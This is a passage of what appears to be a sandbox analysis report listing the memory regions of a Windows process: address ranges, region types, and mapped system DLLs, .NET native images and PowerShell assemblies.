0x750aafff entry_point = 0x750a0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 851 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 852 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 853 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 854 start_va = 0x11e0000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 855 start_va = 0x1380000 end_va = 0x164efff entry_point = 0x1380000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 856 start_va = 0x73f40000 end_va = 0x74034fff entry_point = 0x73f40000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 857 start_va = 0x74080000 end_va = 0x7421dfff entry_point = 0x74080000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 858 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 859 start_va = 0x737f0000 end_va = 0x73810fff entry_point = 0x737f0000 region_type = mapped_file name = "ntmarta.dll" filename = 
"\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 860 start_va = 0x76df0000 end_va = 0x76e34fff entry_point = 0x76df0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 861 start_va = 0x11c0000 end_va = 0x11c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 862 start_va = 0x1220000 end_va = 0x1244fff entry_point = 0x1220000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 863 start_va = 0x1650000 end_va = 0x1a42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001650000" filename = "" Region: id = 864 start_va = 0x75240000 end_va = 0x75251fff entry_point = 0x75240000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 865 start_va = 0x75370000 end_va = 0x75396fff entry_point = 0x75370000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 866 start_va = 0x76910000 end_va = 0x76aacfff entry_point = 0x76910000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 867 start_va = 0x71220000 end_va = 0x7126bfff entry_point = 0x71220000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: 
"c:\\windows\\system32\\apphelp.dll") Region: id = 868 start_va = 0x6ee80000 end_va = 0x6eeadfff entry_point = 0x6ee80000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 869 start_va = 0x1250000 end_va = 0x128ffff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 870 start_va = 0x1a50000 end_va = 0x1b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a50000" filename = "" Region: id = 871 start_va = 0x1be0000 end_va = 0x1c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001be0000" filename = "" Region: id = 872 start_va = 0x6ee70000 end_va = 0x6ee78fff entry_point = 0x6ee70000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 873 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 874 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 875 start_va = 0x2b0000 end_va = 0x2b3fff entry_point = 0x2b0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 876 start_va = 0x11d0000 end_va = 0x11d3fff entry_point = 0x11d0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 877 start_va = 0x1290000 end_va = 0x12bffff entry_point = 0x1290000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = 
"\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 878 start_va = 0x1b50000 end_va = 0x1bb5fff entry_point = 0x1b50000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 879 start_va = 0x6fe10000 end_va = 0x6fe7ffff entry_point = 0x6fe10000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 880 start_va = 0x74f40000 end_va = 0x74f58fff entry_point = 0x74f40000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 881 start_va = 0x1da0000 end_va = 0x1ddffff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 882 start_va = 0x6fe80000 end_va = 0x6fe8afff entry_point = 0x6fe80000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 883 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 884 start_va = 0x73460000 end_va = 0x73469fff entry_point = 0x73460000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 885 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = 
"\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 886 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 887 start_va = 0x63c60000 end_va = 0x63cd9fff entry_point = 0x63c60000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 888 start_va = 0x12c0000 end_va = 0x12c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012c0000" filename = "" Region: id = 889 start_va = 0x1c80000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 890 start_va = 0x63160000 end_va = 0x6370afff entry_point = 0x63160000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 891 start_va = 0x6e8e0000 end_va = 0x6e97afff entry_point = 0x6e8e0000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll") Region: id = 892 start_va = 0x12d0000 end_va = 0x12d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012d0000" filename = "" Region: id = 893 start_va = 0x12e0000 end_va = 0x12e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012e0000" filename = "" Region: id = 894 start_va = 0x12f0000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = 
"private_0x00000000012f0000" filename = "" Region: id = 895 start_va = 0x1300000 end_va = 0x130ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 896 start_va = 0x1350000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 897 start_va = 0x1360000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 898 start_va = 0x1bc0000 end_va = 0x1bcffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 899 start_va = 0x1bd0000 end_va = 0x1bdffff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 900 start_va = 0x1cc0000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 901 start_va = 0x1d80000 end_va = 0x1d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 902 start_va = 0x1ee0000 end_va = 0x1f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 903 start_va = 0x1f20000 end_va = 0x3f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 904 start_va = 0x3fc0000 end_va = 0x3ffffff entry_point = 0x0 region_type = private name = "private_0x0000000003fc0000" filename = "" Region: id = 905 start_va = 0x61c30000 end_va = 0x62727fff entry_point = 0x61c30000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll") Region: id = 906 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private 
name = "private_0x000000007ffd8000" filename = "" Region: id = 907 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 908 start_va = 0x1c20000 end_va = 0x1c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 909 start_va = 0x4000000 end_va = 0x42e1fff entry_point = 0x4000000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 910 start_va = 0x61490000 end_va = 0x61c2bfff entry_point = 0x61490000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll") Region: id = 911 start_va = 0x6d1e0000 end_va = 0x6d260fff entry_point = 0x6d1e0000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4bdde288f147e3b3f2c090ecdf704e6d\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4bdde288f147e3b3f2c090ecdf704e6d\\microsoft.powershell.consolehost.ni.dll") Region: id = 912 start_va = 0x60920000 end_va = 0x61199fff entry_point = 0x60920000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\a8e3a41ecbcc4bb1598ed5719f965110\\System.Management.Automation.ni.dll" (normalized: 
"c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\a8e3a41ecbcc4bb1598ed5719f965110\\system.management.automation.ni.dll") Region: id = 913 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 914 start_va = 0x611a0000 end_va = 0x61481fff entry_point = 0x611a0000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 915 start_va = 0x611a0000 end_va = 0x61481fff entry_point = 0x611a0000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 916 start_va = 0x1c30000 end_va = 0x1c32fff entry_point = 0x1c30000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls") Region: id = 917 start_va = 0x1de0000 end_va = 0x1e9ffff entry_point = 0x1de0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 918 start_va = 0x77110000 end_va = 0x77114fff entry_point = 0x77110000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 919 start_va = 0x1c40000 end_va = 0x1c40fff entry_point = 
0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 920 start_va = 0x1c50000 end_va = 0x1c54fff entry_point = 0x1c50000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 921 start_va = 0x3f20000 end_va = 0x3f60fff entry_point = 0x3f20000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 922 start_va = 0x611a0000 end_va = 0x61481fff entry_point = 0x611a0000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 923 start_va = 0x611a0000 end_va = 0x61481fff entry_point = 0x611a0000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 924 start_va = 0x1c60000 end_va = 0x1c67fff entry_point = 0x1c60000 region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 925 start_va = 0x1c70000 
end_va = 0x1c70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Region: id = 926 start_va = 0x3f70000 end_va = 0x3fb2fff entry_point = 0x3f70000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 927 start_va = 0x638e0000 end_va = 0x6397bfff entry_point = 0x638e0000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll") Region: id = 928 start_va = 0x63980000 end_va = 0x63a04fff entry_point = 0x63980000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\f1865caa683ceb3d12b383a94a35da14\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\f1865caa683ceb3d12b383a94a35da14\\microsoft.wsman.management.ni.dll") Region: id = 929 start_va = 0x67aa0000 end_va = 0x67ae2fff entry_point = 0x67aa0000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 930 start_va = 0x6cfa0000 end_va = 0x6d1d4fff entry_point = 0x6cfa0000 region_type = mapped_file name = "system.core.ni.dll" filename = 
"\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll") Region: id = 931 start_va = 0x6f260000 end_va = 0x6f2aafff entry_point = 0x6f260000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\e112e4460a0c9122de8c382126da4a2f\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\e112e4460a0c9122de8c382126da4a2f\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 932 start_va = 0x72270000 end_va = 0x72294fff entry_point = 0x72270000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll") Region: id = 933 start_va = 0x1d60000 end_va = 0x1d60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d60000" filename = "" Region: id = 934 start_va = 0x60340000 end_va = 0x60347fff entry_point = 0x60340000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll") Region: id = 935 start_va = 0x606b0000 end_va = 0x60772fff entry_point = 0x606b0000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\583c7b9f52114c026088bdb9f19f64e8\\Microsoft.PowerShell.Commands.Management.ni.dll" 
(normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\583c7b9f52114c026088bdb9f19f64e8\\microsoft.powershell.commands.management.ni.dll") Region: id = 936 start_va = 0x60780000 end_va = 0x6091dfff entry_point = 0x60780000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\82d7758f278f47dc4191abab1cb11ce3\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\82d7758f278f47dc4191abab1cb11ce3\\microsoft.powershell.commands.utility.ni.dll") Region: id = 937 start_va = 0x71f80000 end_va = 0x71facfff entry_point = 0x71f80000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\6c5bef3ab74c06a641444eff648c0dde\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\6c5bef3ab74c06a641444eff648c0dde\\microsoft.powershell.security.ni.dll") Region: id = 938 start_va = 0x1d60000 end_va = 0x1d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 939 start_va = 0x42f0000 end_va = 0x4343fff entry_point = 0x42f0000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll") Region: id = 940 start_va = 0x5ff40000 end_va = 0x60053fff entry_point = 0x5ff40000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll" (normalized: 
"c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll") Region: id = 941 start_va = 0x60060000 end_va = 0x60163fff entry_point = 0x60060000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll") Region: id = 942 start_va = 0x60170000 end_va = 0x606a5fff entry_point = 0x60170000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll") Region: id = 943 start_va = 0x71b70000 end_va = 0x71b74fff entry_point = 0x71b70000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll") Region: id = 944 start_va = 0x1d70000 end_va = 0x1d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 945 start_va = 0x1d90000 end_va = 0x1d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 946 start_va = 0x1ea0000 end_va = 0x1eb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 947 start_va = 0x1ec0000 end_va = 0x1ecffff entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 948 start_va = 0x1ed0000 end_va = 0x1edffff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 949 start_va = 0x4350000 end_va = 0x435ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 950 start_va = 0x4360000 end_va = 0x436ffff entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 951 start_va = 0x4370000 end_va = 0x437ffff entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 952 start_va = 0x4380000 end_va = 0x438ffff entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 953 start_va = 0x74fb0000 end_va = 0x74fb7fff entry_point = 0x74fb0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 954 start_va = 0x74fd0000 end_va = 0x74feafff entry_point = 0x74fd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 955 start_va = 0x4390000 end_va = 0x440ffff entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 956 start_va = 0x4410000 end_va = 0x441ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 957 start_va = 0x4420000 end_va = 0x46f1fff entry_point = 0x4420000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 958 start_va = 0x4700000 end_va = 0x4700fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004700000" filename = "" Region: id = 959 start_va = 0x5f8e0000 end_va = 0x5ff30fff entry_point = 0x5f8e0000 region_type = mapped_file name = "system.data.ni.dll" filename = 
"\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Data\\1e85062785e286cd9eae9c26d2c61f73\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.data\\1e85062785e286cd9eae9c26d2c61f73\\system.data.ni.dll") Region: id = 960 start_va = 0x64e70000 end_va = 0x65141fff entry_point = 0x64e70000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 961 start_va = 0x75110000 end_va = 0x7511bfff entry_point = 0x75110000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 962 start_va = 0x75120000 end_va = 0x7523cfff entry_point = 0x75120000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 963 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 964 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 965 start_va = 0x4710000 end_va = 0x471ffff entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 966 start_va = 0x4720000 end_va = 0x4720fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004720000" filename = "" Region: id = 967 start_va = 0x6ba90000 end_va = 0x6baeafff entry_point = 0x6ba90000 region_type = mapped_file name = 